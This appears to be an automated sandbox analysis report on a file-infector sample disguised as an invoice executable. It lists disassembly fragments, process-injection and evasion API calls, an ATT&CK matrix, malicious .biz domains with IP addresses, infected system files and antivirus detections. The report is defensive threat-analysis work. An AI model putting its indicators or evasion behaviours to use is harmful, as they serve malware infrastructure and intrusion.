Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 17_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 17_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 17_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 17_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 17_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 17_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 17_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 17_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CAEB1D mov eax, dword ptr fs:[00000030h] | 17_2_03CAEB1D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C5EB20 mov eax, dword ptr fs:[00000030h] | 17_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C5EB20 mov eax, dword ptr fs:[00000030h] | 17_2_03C5EB20
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF8B28 mov eax, dword ptr fs:[00000030h] | 17_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CF8B28 mov eax, dword ptr fs:[00000030h] | 17_2_03CF8B28
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C86ACC mov eax, dword ptr fs:[00000030h] | 17_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C86ACC mov eax, dword ptr fs:[00000030h] | 17_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C86ACC mov eax, dword ptr fs:[00000030h] | 17_2_03C86ACC
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C30AD0 mov eax, dword ptr fs:[00000030h] | 17_2_03C30AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C64AD0 mov eax, dword ptr fs:[00000030h] | 17_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C64AD0 mov eax, dword ptr fs:[00000030h] | 17_2_03C64AD0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C6AAEE mov eax, dword ptr fs:[00000030h] | 17_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C6AAEE mov eax, dword ptr fs:[00000030h] | 17_2_03C6AAEE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 17_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 17_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 17_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 17_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 17_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 17_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 17_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 17_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3EA80 mov eax, dword ptr fs:[00000030h] | 17_2_03C3EA80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03D04A80 mov eax, dword ptr fs:[00000030h] | 17_2_03D04A80
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C68A90 mov edx, dword ptr fs:[00000030h] | 17_2_03C68A90
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C38AA0 mov eax, dword ptr fs:[00000030h] | 17_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C38AA0 mov eax, dword ptr fs:[00000030h] | 17_2_03C38AA0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C86AA4 mov eax, dword ptr fs:[00000030h] | 17_2_03C86AA4
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 17_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 17_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 17_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 17_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 17_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 17_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C36A50 mov eax, dword ptr fs:[00000030h] | 17_2_03C36A50
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C40A5B mov eax, dword ptr fs:[00000030h] | 17_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C40A5B mov eax, dword ptr fs:[00000030h] | 17_2_03C40A5B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C6CA6F mov eax, dword ptr fs:[00000030h] | 17_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C6CA6F mov eax, dword ptr fs:[00000030h] | 17_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C6CA6F mov eax, dword ptr fs:[00000030h] | 17_2_03C6CA6F
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CDEA60 mov eax, dword ptr fs:[00000030h] | 17_2_03CDEA60
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CACA72 mov eax, dword ptr fs:[00000030h] | 17_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CACA72 mov eax, dword ptr fs:[00000030h] | 17_2_03CACA72
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CBCA11 mov eax, dword ptr fs:[00000030h] | 17_2_03CBCA11
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C6CA24 mov eax, dword ptr fs:[00000030h] | 17_2_03C6CA24
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C5EA2E mov eax, dword ptr fs:[00000030h] | 17_2_03C5EA2E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C54A35 mov eax, dword ptr fs:[00000030h] | 17_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C54A35 mov eax, dword ptr fs:[00000030h] | 17_2_03C54A35
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C6CA38 mov eax, dword ptr fs:[00000030h] | 17_2_03C6CA38
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CC69C0 mov eax, dword ptr fs:[00000030h] | 17_2_03CC69C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 17_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 17_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 17_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 17_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 17_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C3A9D0 mov eax, dword ptr fs:[00000030h] | 17_2_03C3A9D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C649D0 mov eax, dword ptr fs:[00000030h] | 17_2_03C649D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CFA9D3 mov eax, dword ptr fs:[00000030h] | 17_2_03CFA9D3
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03CBE9E0 mov eax, dword ptr fs:[00000030h] | 17_2_03CBE9E0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C629F9 mov eax, dword ptr fs:[00000030h] | 17_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C629F9 mov eax, dword ptr fs:[00000030h] | 17_2_03C629F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 17_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 17_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 17_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 17_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 17_2_03C429A0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h] | 17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C429A0 mov eax, dword ptr fs:[00000030h]17_2_03C429A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C309AD mov eax, dword ptr fs:[00000030h]17_2_03C309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C309AD mov eax, dword ptr fs:[00000030h]17_2_03C309AD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB89B3 mov esi, dword ptr fs:[00000030h]17_2_03CB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB89B3 mov eax, dword ptr fs:[00000030h]17_2_03CB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB89B3 mov eax, dword ptr fs:[00000030h]17_2_03CB89B3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB0946 mov eax, dword ptr fs:[00000030h]17_2_03CB0946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D04940 mov eax, dword ptr fs:[00000030h]17_2_03D04940
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C56962 mov eax, dword ptr fs:[00000030h]17_2_03C56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C56962 mov eax, dword ptr fs:[00000030h]17_2_03C56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C56962 mov eax, dword ptr fs:[00000030h]17_2_03C56962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C7096E mov eax, dword ptr fs:[00000030h]17_2_03C7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C7096E mov edx, dword ptr fs:[00000030h]17_2_03C7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C7096E mov eax, dword ptr fs:[00000030h]17_2_03C7096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD4978 mov eax, dword ptr fs:[00000030h]17_2_03CD4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CD4978 mov eax, dword ptr fs:[00000030h]17_2_03CD4978
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBC97C mov eax, dword ptr fs:[00000030h]17_2_03CBC97C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE908 mov eax, dword ptr fs:[00000030h]17_2_03CAE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CAE908 mov eax, dword ptr fs:[00000030h]17_2_03CAE908
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBC912 mov eax, dword ptr fs:[00000030h]17_2_03CBC912
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C28918 mov eax, dword ptr fs:[00000030h]17_2_03C28918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C28918 mov eax, dword ptr fs:[00000030h]17_2_03C28918
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CB892A mov eax, dword ptr fs:[00000030h]17_2_03CB892A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CC892B mov eax, dword ptr fs:[00000030h]17_2_03CC892B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C5E8C0 mov eax, dword ptr fs:[00000030h]17_2_03C5E8C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03D008C0 mov eax, dword ptr fs:[00000030h]17_2_03D008C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CFA8E4 mov eax, dword ptr fs:[00000030h]17_2_03CFA8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]17_2_03C6C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C6C8F9 mov eax, dword ptr fs:[00000030h]17_2_03C6C8F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C30887 mov eax, dword ptr fs:[00000030h]17_2_03C30887
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03CBC89D mov eax, dword ptr fs:[00000030h]17_2_03CBC89D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03C42840 mov ecx, dword ptr fs:[00000030h]17_2_03C42840
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,0_2_004580A9
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0042A155
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_0042A124 SetUnhandledExceptionFilter,0_2_0042A124
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BC1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00BC1361
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exeCode function: 0_2_00BC4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00BC4C7B

          HIPS / PFW / Operating System Protection Evasion

          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtOpenKeyEx: Indirect: 0x140077B9B
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtQueryValueKey: Indirect: 0x140077C9F
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | NtClose: Indirect: 0x140077E81
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 310D008
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_004587B1 LogonUserW
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00403B3A GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_004048D7 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00464C53 mouse_event
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\INV_NE_02_2034388.exe"
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00457CAF GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0045874B AllocateAndInitializeSid,CheckTokenMembership,FreeSid
          Source: INV_NE_02_2034388.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
          Source: INV_NE_02_2034388.exe | Binary or memory string: Shell_TrayWnd
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_0042862B cpuid
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\AppVClient.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TST256E.tmp VolumeInformation
          Source: C:\Windows\System32\FXSSVC.exe | Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TST256F.tmp VolumeInformation
          Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | Queries volume information: C:\ VolumeInformation
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00434E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00441E06 GetUserNameW
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00433F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

          Stealing of Sensitive Information

          Source: Yara match | File source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000011.00000002.1702591892.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.1704054953.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: INV_NE_02_2034388.exe | Binary or memory string: WIN_81
          Source: INV_NE_02_2034388.exe | Binary or memory string: WIN_XP
          Source: INV_NE_02_2034388.exe | Binary or memory string: WIN_XPe
          Source: INV_NE_02_2034388.exe | Binary or memory string: WIN_VISTA
          Source: INV_NE_02_2034388.exe | Binary or memory string: WIN_7
          Source: INV_NE_02_2034388.exe | Binary or memory string: WIN_8
          Source: INV_NE_02_2034388.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

          Remote Access Functionality

          Source: Yara match | File source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 00000011.00000002.1702591892.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000011.00000002.1704054953.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00476283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
          Source: C:\Users\user\Desktop\INV_NE_02_2034388.exe | Code function: 0_2_00476747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket
          ATT&CK matrix, techniques listed by tactic (a count shown beside a technique in the original matrix is reproduced in parentheses):
          Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology; IP Addresses; Network Security Appliances; Gather Victim Org Information
          Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising; Compromise Infrastructure; Domains; DNS Server
          Initial Access: Valid Accounts (2); Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise; Compromise Software Dependencies and Development Tools; Compromise Software Supply Chain
          Execution: Native API (3); Service Execution (2); At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter; PowerShell; AppleScript; Windows Command Shell
          Persistence: LSASS Driver (2); DLL Side-Loading (1); Valid Accounts (2); Windows Service (1); Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
          Privilege Escalation: Exploitation for Privilege Escalation (1); Abuse Elevation Control Mechanism (1); LSASS Driver (2); DLL Side-Loading (1); Valid Accounts (2); Access Token Manipulation (21); Windows Service (1); Process Injection (212); At; Cron; Launchd; Scheduled Task
          Defense Evasion: Disable or Modify Tools (1); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); Software Packing (1); Timestomp (1); DLL Side-Loading (1); Masquerading (222); Valid Accounts (2); Virtualization/Sandbox Evasion (2); Access Token Manipulation (21); Process Injection (212)
          Credential Access: Input Capture (21); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing; Input Capture; Keylogging
          Discovery: System Time Discovery (2); Account Discovery (1); File and Directory Discovery (1); System Information Discovery (125); Security Software Discovery (251); Virtualization/Sandbox Evasion (2); Process Discovery (3); Application Window Discovery (1); System Owner/User Discovery (1); Network Service Discovery; System Network Connections Discovery; Process Discovery
          Lateral Movement: Taint Shared Content (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections; Shared Webroot; Software Deployment Tools; Taint Shared Content
          Collection: Archive Collected Data (1); Input Capture (21); Clipboard Data (3); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging; Remote Data Staging; Screen Capture
          Command and Control: Ingress Tool Transfer (1); Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (12); Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols; Mail Protocols; DNS
          Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted Non-C2 Protocol; Exfiltration Over Physical Medium
          Impact: System Shutdown/Reboot (1); Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement; External Defacement; Firmware Corruption; Resource Hijacking

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          Behavior Graph ID: 1574347 | Sample: INV_NE_02_2034388.exe | Start date: 13/12/2024 | Architecture: WINDOWS | Score: 100
          Start node:
          • DNS/IP: zlenh.biz; uhxqin.biz; 5 other IPs or domains
          • Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Antivirus detection for dropped file; 8 other signatures
          • Started processes: INV_NE_02_2034388.exe (3); AppVClient.exe (1); FXSSVC.exe (15 4); 7 other processes
          INV_NE_02_2034388.exe:
          • DNS/IP: ssbzmoy.biz 18.141.10.107, 49702, 49703, 49738, AMAZON-02US, United States; pywolwnvd.biz 54.244.188.177, 49700, 49701, 49705, AMAZON-02US, United States
          • Dropped files: C:\Windows\System32\msdtc.exe (PE32+); C:\Windows\System32\alg.exe (PE32+); C:\Windows\System32\FXSSVC.exe (PE32+); 6 other malicious files
          • Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; 3 other signatures
          • Started process: svchost.exe
          AppVClient.exe:
          • Signatures: Antivirus detection for dropped file; Creates files in the system32 config directory; Machine Learning detection for dropped file; Contains functionality to behave differently if execute on a Russian/Kazak computer
          7 other processes:
          • Signatures: Found direct / indirect Syscall (likely to bypass EDR)

          Source | Detection | Scanner | Label
          INV_NE_02_2034388.exe | 82% | ReversingLabs | Win32.Virus.Expiro
          INV_NE_02_2034388.exe | 100% | Avira | W32/Infector.Gen
          INV_NE_02_2034388.exe | 100% | Joe Sandbox ML |
          Source | Detection | Scanner | Label
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Avira | W32/Infector.Gen
          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | 100% | Avira | W32/Infector.Gen
          C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe | 100% | Avira | W32/Infector.Gen
          C:\Windows\System32\AppVClient.exe | 100% | Avira | W32/Infector.Gen
          C:\Windows\System32\msdtc.exe | 100% | Avira | W32/Infector.Gen
          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | 100% | Avira | W32/Infector.Gen
          C:\Windows\System32\FXSSVC.exe | 100% | Avira | W32/Infector.Gen
          C:\Windows\System32\alg.exe | 100% | Avira | W32/Infector.Gen
          C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe | 100% | Avira | W32/Infector.Gen
          C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe | 100% | Joe Sandbox ML |
          C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe | 100% | Joe Sandbox ML |
